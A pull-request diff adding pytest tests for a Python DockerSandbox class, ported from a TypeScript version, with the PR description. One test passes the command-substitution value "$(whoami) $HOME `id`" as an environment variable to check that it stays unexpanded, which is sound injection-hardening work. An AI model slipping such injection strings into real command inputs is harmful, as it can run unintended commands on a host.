+    subprocess.run(["docker", "rm", "-f", CONTAINER_NAME], capture_output=True)
+    subprocess.run(
+        ["docker", "run", "-d", "--name", CONTAINER_NAME, "alpine:latest", "tail", "-f", "/dev/null"],
+        check=True,
+        capture_output=True,
+    )
+    try:
+        yield CONTAINER_NAME
+    finally:
+        subprocess.run(["docker", "rm", "-f", CONTAINER_NAME], capture_output=True)
+
+
+async def test_runs_commands_capturing_stdout_stderr_and_exit_code(container):
+    sandbox = DockerSandbox(container)
+
+    result = await sandbox.execute("echo hello && echo err >&2")
+    assert result.exit_code == 0
+    assert result.stdout == "hello\n"
+    assert result.stderr == "err\n"
+
+    failed = await sandbox.execute("exit 42")
+    assert failed.exit_code == 42
+
+
+async def test_runs_code_via_execute_code(container):
+    result = await DockerSandbox(container).execute_code("echo $((6 * 7))", "sh")
+    assert result.exit_code == 0
+    assert result.stdout == "42\n"
+
+
+async def test_round_trips_text_and_binary_files(container):
+    sandbox = DockerSandbox(container)
+
+    await sandbox.write_text("greeting.txt", "hello docker")
+    assert await sandbox.read_text("greeting.txt") == "hello docker"
+
+    data = bytes([0, 1, 2, 127, 128, 254, 255])
+    await sandbox.write_file("binary.bin", data)
+    assert await sandbox.read_file("binary.bin") == data
+
+
+async def test_lists_and_removes_files(container):
+    sandbox = DockerSandbox(container)
+
+    await sandbox.write_text("a.txt", "a")
+    await sandbox.write_text("b.txt", "b")
+
+    names = [f.name for f in await sandbox.list_files(".")]
+    assert "a.txt" in names
+    assert "b.txt" in names
+
+    await sandbox.remove_file("a.txt")
+    with pytest.raises(FileNotFoundError):
+        await sandbox.read_file("a.txt")
+
+
+async def test_respects_custom_working_dir(container):
+    result = await DockerSandbox(container, working_dir="/opt").execute("pwd")
+    assert result.stdout.strip() == "/opt"
+
+
+async def test_respects_per_command_cwd_override(container):
+    result = await DockerSandbox(container).execute("pwd", cwd="/usr")
+    assert result.stdout.strip() == "/usr"
+
+
+async def test_kills_command_on_timeout(container):
+    with pytest.raises(TimeoutError, match="timed out"):
+        await DockerSandbox(container).execute("sleep 60", timeout=0.5)
+
+
+async def test_passes_env_vars_to_the_command(container):
+    result = await DockerSandbox(container).execute("echo $MY_VAR", env={"MY_VAR": "hello-from-env"})
+    assert result.stdout.strip() == "hello-from-env"
+
+
+async def test_passes_env_values_with_metacharacters_literally(container):
+    # '-e KEY=VALUE' is argv, not shell input, so Docker stores the value verbatim.
+    # printenv reads it without a shell touching the value: any expansion here is a bug.
+    value = "$(whoami) $HOME `id`"
+    result = await DockerSandbox(container).execute("printenv MY_VAR", env={"MY_VAR": value})
+    assert result.exit_code == 0
+    assert result.stdout.strip() == value
+
+
+async def test_returns_error_for_nonexistent_container():
+    result = await DockerSandbox("nonexistent123").execute("echo hi")
+    assert result.exit_code != 0
+    assert "No such container" in result.stderr


### PR DESCRIPTION
## Description
<!-- Provide a detailed description of the changes in this PR -->

This PR ports the Docker/SSH Sandbox Typescript implementations from `src/strands-ts` to Python in `src/strands-py`.

## Related Issues

<!-- Link to related issues using #issue-number format -->

- Typescript PRs:
  - https://github.com/strands-agents/sdk-typescript/pull/1110
  - https://github.com/strands-agents/harness-sdk/pull/2561

## Documentation PR

<!-- If this PR requires documentation changes, include them in this PR under site/ -->

Not yet

## Type of Change

<!-- Choose one of the following types of changes, delete the rest -->

New feature

## Testing

How have you tested the change?  Verify that the changes do not break functionality or introduce warnings in consuming repositories: agents-docs, agents-tools, agents-cli

- [x] I ran `hatch run prepare`

## Checklist
- [x] I have read the CONTRIBUTING document
- [x] I have added any necessary tests that prove my fix is effective or my feature works
- [ ] I have updated the documentation accordingly
- [x] I have added an appropriate example to the documentation to outline the feature, or no new docs are needed
- [x] My changes generate no new warnings
- [x] Any dependent changes have been merged and published

----

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.
